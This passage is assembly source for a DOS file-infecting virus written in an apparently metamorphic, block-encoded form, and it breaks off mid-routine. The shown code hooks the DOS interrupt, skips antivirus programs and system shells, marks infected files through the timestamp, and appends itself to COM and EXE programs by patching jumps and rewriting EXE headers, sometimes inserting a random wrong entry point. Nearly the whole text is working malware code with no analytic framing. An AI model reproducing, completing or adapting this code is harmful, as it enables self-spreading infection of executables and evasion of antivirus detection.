cmp ax,('bt' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to ...
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,('va' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to i...
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,('-f' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; F-PROT? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,('cs' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; McAfee ViruScan? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,('oc' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; COMMAND.COM? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,('iw' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; WIN.COM? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,('rk' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov cx,ds ; CX = segment of filename
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cs ; Save CS at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ds ; Load DS from stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,3524h ; Get interrupt vector 24h
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push es ; Save ES at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push bx ; Save BX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push dx ; Save DX at stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov dx,1234h ; DX = offset of int24_virus
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1770h ; Pointer to int24_virus
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,2524h ; Set interrupt vector 24h
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ds,cx ; DS = segment of filename
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov es,cx ; ES = segment of filename
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,3d02h ; Open file (read/write)
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov bx,1234h ; BX = offset of int21_jump
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0c9h ; Pointer to int21_jump
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc bx ; BX = offset of address of interr...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pushf ; Save flags at stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
call dword ptr cs:[bx]
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to int24_store
|
|||
|
dw 1771h ; Pointer to int24_store
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov bx,ax ; BX = file handle
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cs ; Save CS at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ds ; Load DS from stack (CS)
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,5700h ; Get file's date and time
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],dx ; Store file's date
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 12dh ; Pointer to file_date
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,cl ; AL = low-order byte of file time
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
and al,00011111b ; AL = file seconds
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,00000100b ; Already infected (8 seconds)?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
and cl,11100000b ; Zero file seconds
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
or cl,00000100b ; Set infection mark (8 seconds)
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],cx ; Store file's time
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 12ch ; Pointer to file_time
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,3fh ; Read from file
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,03h ; Read three bytes
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov dx,1234h ; DX = offset of origin_code_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1f40h ; Pointer to origin_code_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov si,dx ; SI = offset of origin_code_
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
lodsw ; AX = EXE signature
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,'ZM' ; EXE signature?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to infect_exe
|
|||
|
dw 138dh ; Pointer to infect_exe
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,'MZ' ; EXE signature?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to infect_exe
|
|||
|
dw 138dh ; Pointer to infect_exe
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1234h ; SI = offset of initial_cs_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1389h ; Pointer to initial_cs_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [si],0fff0h ; Store initial CS relative to sta...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1234h ; SI = offset of initial_ss_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138ah ; Pointer to initial_ss_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [si],0fff0h ; Store initial SS relative to sta...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1234h ; SI = offset of initial_ip_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138bh ; Pointer to initial IP
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [si],100h ; Store initial IP
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1234h ; SI = offset of initial_sp_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138ch ; Pointer to initial_sp_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [si],0fffeh ; Store initial SP
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1234h ; SI = offset of mcb_size__
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1395h ; Pointer to mcb_size__
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [si],0ffffh ; Store size of memory block in pa...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1234h ; SI = offset of new_mcb_siz
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1393h ; Pointer to new_mcb_siz
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [si],1000h ; Store new size in paragraphs
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,00h ; COM executable
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],al ; Store executable status
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1388h ; Pointer to executa_sta
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,4202h ; Set current file position (EOF)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor cx,cx ; CX = high-order word of offset f...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor dx,dx ; DX = low-order word of offset f...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,0e000h ; Filesize too large?
|
|||
|
|
|||
|
db 01110111b+10000000b ; Above? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add ax,100h ; AX = delta offset
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[01h],ax ; Store delta offset
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,40h ; Write to file
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor dx,dx ; Zero DX
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,1234h ; CX = length of virus
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 66h ; Pointer to virus_end
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,4200h ; Set current file position (SOF)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor cx,cx ; CX = high-order word of offset f...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor dx,dx ; DX = low-order word of offset fr...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov di,1234h ; DI = offset of origin_code_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1f40h ; Pointer to origin_code_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov dx,di ; DX = offset of origin_code_
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov byte ptr [di],11101001b
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub ax,03h ; AX = offset of virus within infe...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov [di+01h],ax ; Store offset of virus within inf...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,03h ; Write three bytes
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,40h ; Write to file
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 138eh ; Pointer to set_file_inf
|
|||
|
db 11101111b ; End of block
|
|||
|
set_file_inf db 11101110b ; Beginning of block
|
|||
|
dw 138eh ; Block identification of set_file...
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,5701h ; Set file's date and time
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,ds:[1234h] ; CX = new time
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 12ch ; Pointer to file_time
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov dx,ds:[1234h] ; DX = new date
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 12dh ; Pointer to file_date
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0fah ; Block identification of close_file
|
|||
|
db 11101111b ; End of block
|
|||
|
close_file db 11101110b ; Beginning of block
|
|||
|
dw 0fah ; Block identification of close_file
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,3eh ; Close file
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1771h ; Pointer to int24_store
|
|||
|
db 11101111b ; End of block
|
|||
|
int24_store db 11101110b ; Beginning of block
|
|||
|
dw 1771h ; Block identification of int24_store
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ds ; Load DS from stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,2524h ; Set interrupt vector 21h
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 11101111b ; End of block
|
|||
|
int21_exit db 11101110b ; Beginning of block
|
|||
|
dw 0fbh ; Block identification of int21_exit
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop es ; Load ES from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ds ; Load DS from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop si ; Load SI from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop cx ; Load CX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop bx ; Load BX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load aX from stack
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0c9h ; Pointer to int21_jump
|
|||
|
db 11101111b ; End of block
|
|||
|
int21_jump db 11101110b ; Beginning of block
|
|||
|
dw 0c9h ; Block identification of int21_jump
|
|||
|
db 05h+10h ; Five bytes data
|
|||
|
db 11101010b ; JMP imm32 (opcode 0eah)
|
|||
|
dd 00h ; address of interrupt 21h
|
|||
|
db 11101111b ; End of block
|
|||
|
infect_exe db 11101110b ; Beginning of block
|
|||
|
dw 138dh ; Block identification of infect_exe
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,01h ; EXE executable
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],al ; Store executable status
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1388h ; Pointer to executa_sta
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,4200h ; Set current file position (SOF)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor cx,cx ; CX = high-order word of offset f...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor dx,dx ; CX = low-order word of offset fi...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,3fh ; Read from file
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,18h ; Read twenty-four bytes
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov dx,1234h ; DX = offset of exe_header
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138fh ; Pointer to exe_header
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1234h ; SI = offset of exe_header
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138fh ; Pointer to exe_header
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor ax,ax ; Zero AX
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to maximum_mem
|
|||
|
dw 1399h ; Pointer to maximum_mem
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,[si+04h] ; AX = total number of 512-byte pa...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc ax ; Increase total number of 512-byt...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov cl,05h ; Divide by thirty-two
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shl ax,cl ; AX = total number of 512-byte pa...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub ax,[si+08h] ; Subtract header size in paragrap...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1399h ; Pointer to maximum_mem
|
|||
|
db 11101111b ; End of block
|
|||
|
maximum_mem db 11101110b ; Beginning of block
|
|||
|
dw 1399h ; Block identification of maximum_mem
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add ax,[si+0ch] ; Add maximum paragraphs to alloca...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],ax ; Store size of memory block in pa...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1395h ; Pointer to mcb_size__
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,[si+0eh] ; AX = initial SS relative to star...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],ax ; Store initial SS relative to sta...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138ah ; Pointer to initial_ss_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,[si+10h] ; AX = initial SP
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],ax ; Store initial SP
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138ch ; Pointer to initial_sp_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,[si+14h] ; AX = initial IP
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],ax ; Store initial IP
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138bh ; Pointer to initial_ip_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,[si+16h] ; AX = initial CS relative to star...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],ax ; Store initial CS relative to sta...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1389h ; Pointer to initial_cs_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,14h ; AX = probability of storing inco...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
cmp ds:[1234h],ax ; Store incorrect IP?
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bech ; Pointer to probability_
|
|||
|
db 01110111b+10000000b ; Above? Jump to set_file_pos
|
|||
|
dw 1775h ; Pointer to set_file_pos
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push bp ; Save BP at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ds ; Save DS at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop es ; Load ES from stack (DS)
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov bp,40h ; Random number within sixty-four
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0bd5h ; Pointer to rnd_in_rang
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop bp ; Load BP from stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add ax,[si+14h] ; Add initial IP to random number ...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],ax ; Store incorrect IP
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1773h ; Pointer to incorrec_ip
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1775h ; Pointer to set_file_pos
|
|||
|
db 11101111b ; End of block
|
|||
|
set_file_pos db 11101110b ; Beginning of block
|
|||
|
dw 1775h ; Block identification of set_file...
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,4202h ; Set current file position (EOF)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor cx,cx ; CX = high-order word of offset f...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor dx,dx ; DX = high-order word of offset f...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp dx,06h ; Filesize too large?
|
|||
|
|
|||
|
db 01110111b+10000000b ; Above? Jump to write_virus
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push dx ; Save DX at stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,200h ; Divide by pages
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
div cx ; DX:AX = filesize in pages
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc ax ; Increase total number of 512-byt...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp [si+04h],ax ; Internal overlay?
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push dx ; Save DX at stack
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov [si+0ch],0ffffh ; Store maximum paragraphs to allo...
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov [si+10h],7ffeh ; Store initial SP
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov word ptr [si+14h],00h
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,10h ; Divide by paragraphs
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
div cx ; DX:AX = filesize in paragraphs
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub ax,[si+08h] ; Subtract header size in paragrap...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc ax ; Increase initial CS/SS relative ...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov [si+0eh],ax ; Store initial SS relative to sta...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov [si+16h],ax ; Store initial CS relative to sta...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,[si+04h] ; AX = total number of 512-byte pa...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc ax ; Increase total number of 512-byt...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov cl,05h ; Divide by thirty-two
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shl ax,cl ; AX = total number of 512-byte pa...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub ax,[si+08h] ; Subtract header size in paragrap...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add ax,[si+0ah] ; Add maximum paragraphs to alloca...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov di,ax ; DI = minimum paragraphs to alloc...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop cx ; Load CX from stack (DX)
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop dx ; Load DX from stack (AX)
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
and dx,1111111111110000b
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add dx,10h ; DX = low-order word of offset fr...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
adc cx,00h ; CX = high-order word of offset f...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,4200h ; Set current file position (SOF)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add ax,1234h ; AX = length of virus
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 66h ; Pointer to virus_end
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
adc dx,00h ; Convert to 32-bit
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,200h ; Divide by pages
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
